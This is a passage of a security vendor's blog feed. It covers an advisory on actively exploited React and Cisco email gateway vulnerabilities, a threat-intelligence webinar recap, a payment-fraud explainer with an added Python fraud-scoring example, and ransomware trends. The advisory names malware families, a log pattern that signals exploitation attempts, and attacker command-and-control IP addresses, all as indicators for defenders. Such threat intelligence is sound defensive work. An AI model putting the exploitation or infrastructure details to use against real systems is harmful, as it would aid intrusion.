          <li><strong>Observed payloads</strong> included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)</li>
          <li><strong>Infrastructure connections</strong> to HiddenOrbit relay infrastructure and GobRAT relay component</li>
        </ul>
        <p><strong>Additional activity:</strong></p>
        <ul>
          <li><strong>UAT-9686</strong> exploited Cisco Secure Email Gateway (<strong>CVE-2025-20393</strong>), deploying AquaShell, AquaPurge, and AquaTunnel</li>
          <li><strong>Unknown actors</strong> leveraged Gogs vulnerability (<strong>CVE-2025-8110</strong>) for Supershell malware deployment</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed widespread exploitation.</p>
        <h3>CVE-2025-55182 | Meta React Server Components (React2Shell)</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added December 5, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.</p>
        <p><strong>Affected versions:</strong></p>
        <ul>
          <li>React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)</li>
          <li>Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77</li>
          <li>Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin</li>
        </ul>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately</li>
          <li>Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5</li>
          <li>Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints</li>
          <li>Check logs for <code>E{"digest"</code> error patterns indicating exploitation attempts</li>
          <li>Review server processes for unexpected Node.js child processes</li>
        </ul>
        <p><strong>Exposure:</strong> ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c78e7d8c6ef475aeadada64b85462a8f66332e7c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h3>CVE-2025-20393 | Cisco Secure Email Gateway</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by UAT-9686</p>
        <p><strong>Why this matters:</strong> Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.</p>
        <p><strong>Affected products:</strong> Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Cisco's security updates immediately</li>
          <li>Monitor Spam Quarantine web interface access logs</li>
          <li>Check for modifications to <code>/data/web/euq_webui/htdocs/index.py</code></li>
          <li>Hunt for AquaShell, AquaPurge, and AquaTunnel indicators</li>
          <li>Review outbound connections to suspicious IPs</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Practitioners Reveal What Makes Threat Intelligence Programs Mature]]></title>
            <link>https://www.recordedfuture.com/blog/practitioner-insights-advancing-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/practitioner-insights-advancing-threat-intelligence</guid>
            <pubDate>Fri, 09 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat intelligence practitioners from Global Payments, Adobe, and Superhuman reveal how mature CTI programs transform data overload into strategic business value. Learn proven approaches to automation, cross-functional collaboration, and executive communication.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Intelligence drives better decisions.</strong> High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.</li>
          <li><strong>Maturity means efficiency.</strong> Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.</li>
          <li><strong>Information overload is the top challenge.</strong> Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.</li>
          <li><strong>AI will reshape the analyst role.</strong> While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.</li>
        </ul>
        <p>Recorded Future recently hosted two webinars to unpack key insights from the <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">2025 State of Threat Intelligence Report</a> and hear directly from customers who are putting these findings into practice.</p>
        <p>Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.</p>
        <p>But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.</p>
        <h2>Intelligence as a strategic asset</h2>
        <p>Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”</p>
        <p>Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”</p>
        <p>Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”</p>
        <h2>How threat intelligence delivers organization-wide value</h2>
        <p>Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.</p>
        <p>Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”</p>
        <p>Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”</p>
        <p>Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”</p>
        <h2>The anatomy of a mature threat intelligence program</h2>
        <p>According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.</p>
        <p>“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.</p>
        <p>Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”</p>
        <h2>Pathways to advancing maturity</h2>
        <p>Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”</p>
        <p>Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”</p>
        <h2>Top challenges for CTI teams</h2>
        <p>The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”</p>
        <p>Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.</p>
        <h2>Looking to the future of threat intelligence</h2>
        <p>When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.</p>
        <p>Watch the recordings of the <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/8812722f-c797-43e5-8959-dafb91973948">North America</a> and <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/cd895838-6b18-4d3e-8d02-16287ee95642">EMEA</a> webinar sessions to learn more, and <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">download the 2025 State of Threat Intelligence Report</a> to see how your peers are evaluating, investing in, and operationalizing threat intelligence.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c3dce156d3f3b159e439a8f8b07b4b731d9082a8.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Different Types of Payment Fraud and How to Prevent Them]]></title>
            <link>https://www.recordedfuture.com/blog/types-of-payment-fraud</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/types-of-payment-fraud</guid>
            <pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore the different types of payment fraud and become aware of telltale signs and how to prevent them.]]></description>
            <content:encoded><![CDATA[
        <p>Payment fraud is growing in scale and sophistication, affecting businesses across every industry, and as digital payments expand, so do the opportunities for bad actors to exploit vulnerabilities. Understanding how fraud works and how to prevent it is essential for protecting revenue, maintaining trust, and staying resilient in an increasingly complex threat landscape.</p>
        <h2>What Is Payment Fraud?</h2>
        <p>Payment fraud refers to the theft of money from businesses or individuals through unauthorized transactions or deceptive purchases. Fraudsters may act using their own accounts or by gaining unauthorized access to someone else's account.</p>
        <p>While payment fraud can happen in person, online transactions are especially vulnerable. According to Juniper Research, global business losses from online payment fraud are projected to surpass $362 billion between 2023 and 2028. A business's fraud risk depends largely on its industry, the sensitivity of the data it handles, and the payment methods it accepts. The more ways customers can interact with accounts and complete purchases, the more entry points exist for bad actors to exploit.</p>
        <h2>Different Types of Payment Fraud</h2>
        <p>Fraudsters use many tactics, and below we list 14 of the most common. Given the large number of threats, businesses must prepare their teams to recognize a variety of warning signs. Strong internal communication policies, clear escalation procedures, and knowledge of the landscape are foundational to any fraud prevention strategy.</p>
        <h3>1. Phishing</h3>
        <p>Phishing is a social engineering tactic in which criminals attempt to trick people into revealing sensitive information such as account credentials or payment details. These attacks often come in the form of malicious links sent via email or text, but they can also occur over the phone. Attackers may pose as trusted figures - a friend, a bank representative, or a government official - to manipulate victims.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Let customers know exactly how your business will contact them, including phone numbers and email addresses.</li>
          <li>Be transparent about what information your staff will and will not ask for.</li>
          <li>Alert customers to any known phishing attempts targeting your brand.</li>
          <li><a href="https://www.recordedfuture.com/services/analyst-on-demand">Train employees</a> on information security protocols and how to identify suspicious communications.</li>
        </ul>
        <h3>2. Credit and Debit Card Fraud</h3>
        <p>This type of fraud involves obtaining card information - either physically or digitally - and using it to make unauthorized purchases. Cards may be stolen directly, or details may be harvested through card skimming devices installed on ATMs or point-of-sale terminals. Attackers also acquire card data through phishing schemes or by purchasing stolen credentials on the dark web.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Restrict POS system access to authorized personnel and regularly inspect payment hardware for tampering.</li>
          <li>Build secure, encrypted payment pages that comply with data protection standards.</li>
          <li>Offer customers multiple notification options for purchases and account activity.</li>
          <li>Warn customers never to share account or confirmation numbers with unverified sources.</li>
        </ul>
        <h3>3. Wire Transfer Fraud</h3>
        <p>In wire transfer fraud, criminals convince victims to send money directly to them. Because wire transfers are difficult to reverse, they are a preferred method among scammers. Attackers commonly impersonate someone the victim trusts - a family member, a company executive, or a business vendor. The use of a convincing back-story is often referred to as "social engineering." For example, an attacker may text employees pretending to be their CEO, claiming an emergency and requesting an urgent fund transfer.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Train employees to spot the signs of social engineering and impersonation.</li>
          <li>Establish official communication channels and avoid conducting financial business over easily spoofed channels like text messages.</li>
          <li>Report and share all phishing attempts with the entire team.</li>
        </ul>
        <h3>4. Check Fraud</h3>
        <p>Check fraud involves using counterfeit or altered checks to make payments or writing checks from accounts that lack sufficient funds. Fake checks may be digitally printed or modified versions of real checks. In some cases, the check is genuine but drawn from a closed account.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Implement software that verifies the authenticity of checks.</li>
          <li>Train staff to recognize the visual and physical signs of fraudulent checks.</li>
        </ul>
        <h3>5. Chargeback and Refund Fraud</h3>
        <p>Also known as "friendly fraud," chargeback fraud occurs when a customer makes a legitimate purchase and then falsely claims a refund - either directly from the business or through their credit card company. This type of fraud is particularly tricky because it can be hard to distinguish from genuine disputes, especially when delivery or service quality is involved.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Validate customer information, including billing addresses and card security codes.</li>
          <li>Use payment platforms that include <a href="https://www.recordedfuture.com/services/intelligence-services">fraud protection</a> and dispute automation tools.</li>
          <li>Respond to refund and chargeback requests quickly.</li>
          <li>Minimize legitimate chargebacks by fulfilling orders accurately and on time.</li>
        </ul>
        <h3>6. Identity Theft</h3>
        <p>Identity theft happens when a criminal obtains someone's personal information and uses it for financial gain or to make purchases in someone else's name. For businesses, a common result is having to deal with chargebacks after customers discover fraudulent charges on their accounts. Although the primary victim is the customer, businesses have a responsibility to prevent data breaches that expose customer information in the first place.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Train employees to recognize phishing and follow secure information handling practices.</li>
          <li>Ensure your payment systems comply with PCI DSS (Payment Card Industry Data Security Standard) requirements.</li>
        </ul>
        <h3>7. Account Takeover Fraud</h3>
        <p>Account takeover (ATO) fraud typically follows identity theft. Once attackers obtain a user's credentials, they change the password and contact information to lock the real owner out. From there, they may use the account for fraudulent purchases or sell it to other bad actors.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Enforce strong password requirements for all accounts.</li>
          <li>Require two-factor authentication (2FA) and send confirmation alerts for any significant account changes.</li>
          <li>Notify customers of purchases and account modifications in real time.</li>
        </ul>
        <h3>8. New Account Fraud</h3>
        <p>New account fraud (NAF) occurs when someone uses stolen or fabricated identities to open new lines of credit or accounts. These fraudulent accounts can then be used to make purchases or commit further fraud down the line.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Require multi-factor authentication (MFA) - not just email verification - during account creation.</li>
          <li>Verify address details and card security information during transactions.</li>
          <li>Use fraud protection tools that leverage machine learning to detect unusual account creation patterns.</li>
        </ul>
        <h3>9. Gift Card Fraud</h3>
        <p>Gift card fraud is a social engineering scam where criminals pressure victims into purchasing gift cards and handing over the card numbers. Once the numbers are given, the funds are essentially unrecoverable, making this a popular method among scammers.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Display warnings about gift card scams during the checkout process.</li>
          <li>Remind customers never to share gift card numbers with people they don't personally know.</li>
          <li>Educate in-store staff to recognize signs of gift card fraud and when to escalate the situation.</li>
        </ul>
        <h3>10. Merchant Identity Theft</h3>
        <p>In merchant identity theft, attackers impersonate legitimate businesses or vendors to defraud customers or partner organizations. They may use phishing to extract employee credentials and gain access to business systems, or they may pose as a trusted vendor and redirect payments to themselves.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Train staff to identify phishing attempts and follow secure communication practices.</li>
          <li>Establish verification procedures when communicating with vendors and business partners.</li>
          <li>Report phishing attempts to employees and partners promptly.</li>
        </ul>
        <h3>11. Pagejacking and Domain Spoofing</h3>
        <p>Pagejacking involves cloning an existing webpage and redirecting users to the fake version to steal login credentials or payment information. Domain spoofing follows a similar concept - attackers build an identical-looking site under a slightly different URL. Users are typically directed to these fraudulent pages through malicious emails or texts.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Run plagiarism detection tools to identify duplicate versions of your pages online.</li>
          <li>Pay attention to unusual customer service complaints that might signal a spoofed site.</li>
          <li>Submit takedown requests to search engines if you discover a duplicate site, and notify affected customers.</li>
        </ul>
        <h3>12. Mobile Payment Fraud</h3>
        <p>As mobile payments become more prevalent, they've also become a target for fraud. Attackers can exploit mobile apps through malware installation, stolen app credentials, or interception of 2FA codes. For example, a scammer may call a customer pretending to represent a business and ask them to read back a verification code - which is actually a 2FA code the attacker has triggered on the victim's account.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Authenticate customers over the phone carefully to reduce the risk of impersonation-based fraud.</li>
          <li><a href="https://www.recordedfuture.com/services/managed-monitoring">Monitor</a> for unusual spending or refund activity in mobile transactions.</li>
          <li>Educate customers about the risks of clicking on unknown links, QR codes, or visiting unfamiliar websites.</li>
        </ul>
        <h3>13. Push Payment Fraud</h3>
        <p>Unlike unauthorized transaction fraud, push payment fraud involves tricking the victim into willingly sending money to a fraudster. This can take many forms, including phishing, blackmail, or deceptive scenarios like fake emergencies. The key distinction is that the victim actively initiates the transfer.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Clearly communicate to customers what your staff can and cannot ask them to do or pay.</li>
          <li>Make it easy for customers to report anyone impersonating your business.</li>
          <li>Issue proactive alerts about ongoing scam attempts tied to your brand.</li>
        </ul>
        <h3>14. ACH Payment Fraud</h3>
        <p>ACH (Automated Clearing House) payment fraud involves criminals gaining unauthorized access to a victim's bank account details and using them to initiate fraudulent transfers. For businesses, this risk can come from both outside attackers and malicious insiders.</p>
        <p>Prevention tips:</p>
        <ul>
          <li>Strictly limit and monitor employee access to business bank accounts.</li>
          <li>Educate all staff with account access about phishing tactics and establish firm security policies.</li>
        </ul>
        <h2>Which Businesses Have the Highest Fraud Risk?</h2>
        <p>Not all businesses face the same level of exposure. Fraud risk is generally highest in sectors that process online payments, handle sensitive personal data, or still accept paper checks.</p>
        <h3>E-Commerce Businesses</h3>
        <p>E-Commerce businesses are particularly vulnerable. Online retail involves accepting payments from a wide range of locations, often with multiple payment methods. Features like peer-to-peer payment integrations or international checkout add more potential points of failure. The more accounts and payment methods a customer has linked, the more attractive a target they become for data breaches.</p>
        <h3>Healthcare, Banking, and Data-Sensitive Industries</h3>
        <p>These sectors are at elevated risk because of the high value of the information they store. A breach in these sectors doesn't just expose financial data - it can compromise identity information used to commit fraud across many platforms simultaneously.</p>
        <h3>Businesses Still Accepting Checks</h3>
        <p>These kinds of businesses face unique challenges. As check usage declines, employees may become less experienced at identifying fakes, which makes training and verification systems all the more important. According to the Association for Financial Professionals, check fraud remains one of the most common forms of payment fraud.</p>
        <h2>How to Mitigate Risk</h2>
        <p>A variety of tools and strategies are available to help businesses identify and reduce fraud exposure. Conducting a <a href="https://www.recordedfuture.com/resources/maturity-assessment">security risk assessment</a> is a strong starting point, helping teams understand which vulnerabilities are most critical and where to prioritize investment.</p>
        <p>From there, organizations should focus on establishing a solid operational and security foundation before layering in more advanced fraud detection capabilities.</p>
        <h3>Foundational Controls</h3>
        <p>These measures create a baseline level of protection by securing systems, safeguarding data, and reducing avoidable losses:</p>
        <ul>
          <li>Strong network and password security: Establish internal policies governing account access, password requirements, and physical access to devices and systems.</li>
          <li>Network tokenization: Ensure payment systems encrypt and tokenize customer data to protect sensitive information.</li>
          <li>PCI standards compliance: Build payment workflows that meet Payment Card Industry (PCI) standards to safeguard cardholder data.</li>
          <li>3D Secure (3DS) authentication: Use the latest 3DS protocols to validate transactions and verify user identity before completing purchases.</li>
          <li>Chargeback protection: Work with your payment processor to implement tools that help minimize financial losses from disputed transactions.</li>
        </ul>
        <p>Once these core protections are in place, businesses can enhance their fraud prevention strategies with more dynamic, data-driven approaches.</p>
        <h3>Advanced Detection &amp; Optimization</h3>
        <p>These techniques improve visibility, adaptability, and long-term resilience against evolving fraud tactics:</p>
        <ul>
          <li>Fraud KPI tracking: Monitor key metrics such as dispute rates, authorization rates, and approval/decline ratios to identify trends and respond proactively.</li>
          <li>Rules-based systems: Implement rule-based detection as a reliable operational backbone. While rules require ongoing maintenance, they are especially useful in early stages and can be refined over time.</li>
          <li>Machine learning algorithms: Leverage ML-powered systems to analyze large, complex datasets and uncover patterns that are difficult to detect manually. These models continuously improve as they adapt to new fraud behaviors.</li>
        </ul>
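<p>As an added illustration of the rules-based backbone and the KPI tracking described above (example code, not Recorded Future's or any payment processor's), the following Python sketch scores constructed transactions against a handful of rules and derives the approval/review/decline ratio from the results. Field names, rule weights, thresholds and every transaction are assumptions chosen for the example; a real deployment would tune the weights against its own dispute data.</p>

```python
"""Rule-based payment fraud scoring over constructed transactions.

Added example, not Recorded Future's code. Field names, rule weights,
thresholds and every transaction below are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Rule weights and decision thresholds (assumed values for illustration).
WEIGHTS = {
    "avs_mismatch": 30,            # billing address failed the AVS check
    "cvv_mismatch": 40,            # card security code did not verify
    "geo_mismatch": 25,            # billing country differs from IP country
    "new_account_high_value": 25,  # days-old account making a large purchase
    "card_velocity": 45,           # same card used too often in a short window
}
VELOCITY_WINDOW = timedelta(minutes=10)
VELOCITY_LIMIT = 3      # more than this many uses in the window fires the rule
NEW_ACCOUNT_DAYS = 7
HIGH_AMOUNT = 500.0
REVIEW_THRESHOLD = 40
DECLINE_THRESHOLD = 70

# Constructed sample transactions (not real data).
TRANSACTIONS = [
    {"id": "t1", "card": "card-A", "amount": 42.00, "billing_country": "US",
     "ip_country": "US", "avs_match": True, "cvv_match": True,
     "account_age_days": 400, "ts": "2026-01-08T10:00:00"},
    {"id": "t2", "card": "card-B", "amount": 1250.00, "billing_country": "US",
     "ip_country": "BR", "avs_match": False, "cvv_match": True,
     "account_age_days": 1, "ts": "2026-01-08T10:05:00"},
    {"id": "t3", "card": "card-C", "amount": 89.99, "billing_country": "DE",
     "ip_country": "DE", "avs_match": True, "cvv_match": False,
     "account_age_days": 120, "ts": "2026-01-08T10:10:00"},
] + [
    # Four uses of one card within eight minutes, otherwise clean.
    {"id": f"t{n}", "card": "card-D", "amount": 19.99, "billing_country": "GB",
     "ip_country": "GB", "avs_match": True, "cvv_match": True,
     "account_age_days": 30, "ts": f"2026-01-08T10:{minute}:00"}
    for n, minute in ((4, 20), (5, 22), (6, 25), (7, 28))
]


def score_transaction(txn, uses_in_window):
    """Apply each rule; return the total score and the rules that fired."""
    fired = []
    if not txn["avs_match"]:
        fired.append("avs_mismatch")
    if not txn["cvv_match"]:
        fired.append("cvv_mismatch")
    if txn["billing_country"] != txn["ip_country"]:
        fired.append("geo_mismatch")
    if txn["account_age_days"] < NEW_ACCOUNT_DAYS and txn["amount"] > HIGH_AMOUNT:
        fired.append("new_account_high_value")
    if uses_in_window > VELOCITY_LIMIT:
        fired.append("card_velocity")
    return sum(WEIGHTS[r] for r in fired), fired


def decide(score):
    """Map a score to the action a checkout flow would take."""
    if score >= DECLINE_THRESHOLD:
        return "decline"
    if score >= REVIEW_THRESHOLD:
        return "review"
    return "approve"


def evaluate(transactions):
    """Score transactions in time order, tracking per-card use for the velocity rule."""
    seen = defaultdict(list)  # card -> timestamps still inside the velocity window
    results = {}
    for txn in sorted(transactions, key=lambda t: t["ts"]):
        ts = datetime.fromisoformat(txn["ts"])
        recent = [h for h in seen[txn["card"]] if ts - h <= VELOCITY_WINDOW]
        recent.append(ts)
        seen[txn["card"]] = recent
        score, fired = score_transaction(txn, len(recent))
        results[txn["id"]] = {"score": score, "decision": decide(score), "rules": fired}
    return results


def fraud_kpis(results):
    """Approval/review/decline ratios, one of the KPIs the article says to track."""
    counts = defaultdict(int)
    for r in results.values():
        counts[r["decision"]] += 1
    total = len(results)
    return {d: counts[d] / total for d in ("approve", "review", "decline")}


if __name__ == "__main__":
    outcome = evaluate(TRANSACTIONS)
    for tid, r in outcome.items():
        print(tid, r["decision"], r["score"], r["rules"])
    print(fraud_kpis(outcome))
```

<p>The rules that fired are returned alongside the score so that a reviewer sees why a transaction was held, which is also what makes the rule set maintainable: when the dispute rate for a rule drifts, its weight or threshold can be adjusted without touching the rest of the pipeline.</p>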
        <h2>Staying Ahead of Payment Fraud</h2>
        <p>Payment fraud is an ongoing challenge, but a proactive, layered approach can significantly reduce risk. By combining strong foundational controls with data-driven detection and continuous monitoring, businesses can stay ahead of evolving threats.</p>
        <p>Ultimately, effective fraud prevention requires regular review, employee awareness, and a commitment to adapting as tactics change.</p>
        <h2>Additional Resources</h2>
        <ul>
          <li><a href="https://www.financialprofessionals.org/training-resources/resources/survey-research-economic-data/details/payments-fraud">2026 AFP Payments Fraud and Control Survey Report</a></li>
          <li><a href="https://www.frbservices.org/news/fed360/issues/060325/check-fraud-remains-top-threat">Learn How Federal Reserve Financial Services Can Help Against Check Fraud</a></li>
          <li><a href="https://onlinedegrees.sandiego.edu/cyber-security-statistics/">47 Cybersecurity Statistics and Facts for 2026</a></li>
          <li><a href="https://cltc.berkeley.edu/2025/01/16/beyond-phishing-exploring-the-rise-of-ai-enabled-cybercrime/">Beyond Phishing: Exploring the Rise of AI-enabled Cybercrime</a></li>
          <li><a href="https://www.dol.gov/agencies/eta/ui-modernization/fraud">Preventing Fraud</a></li>
          <li><a href="https://omh.ny.gov/omhweb/resources/internal_control_top_ten.html">Top Ten Internal Controls to Prevent And Detect Fraud</a></li>
          <li><a href="https://thepaymentsassociation.org/article/the-escalating-threat-of-authorised-push-payment-fraud/">The Escalating Threat of Authorised Push Payment Fraud</a></li>
          <li><a href="https://primer.io/blog/spotlight-payments-fraud">Payment Fraud and How To Fight Back</a></li>
          <li><a href="https://privsec.harvard.edu/prevent-phishing">A Short Guide for Spotting Phishing Attempts</a></li>
          <li><a href="https://www.techuk.org/resource/eight-ways-to-combat-fraud-in-the-ai-age.html">Eight Ways to Combat Fraud in The AI Age</a></li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_100da79cbabd12fe9344c4613428d23e68899228e.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[New ransomware tactics to watch out for in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/ransomware-tactics-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ransomware-tactics-2026</guid>
            <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Ransomware groups made less money in 2025 despite a 47% increase in attacks, driving new tactics: bundled DDoS services, insider recruitment, and gig worker exploitation. Learn the emerging trends defenders must prepare for in 2026.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.</li>
          <li>Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.</li>
          <li>Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.</li>
        </ul>
        <h2>The ransomware paradox: More attacks, less money</h2>
        <p>By most accounts, ransomware groups <a href="https://www.coveware.com/blog/2025/10/24/insider-threats-loom-while-ransom-payment-rates-plummet">made less money</a> in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to <a href="https://www.recordedfuture.com/products/threat-intelligence">Recorded Future Intelligence</a>, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.</p>
        <p>For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.</p>
        <p>This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.</p>
        <h2>Trend 1: DDoS services return to the RaaS model</h2>
        <p>With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.</p>
        <p>The newly formed <a href="https://blog.talosintelligence.com/new-chaos-ransomware/">Chaos ransomware group</a> (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.</li>
        </ul>
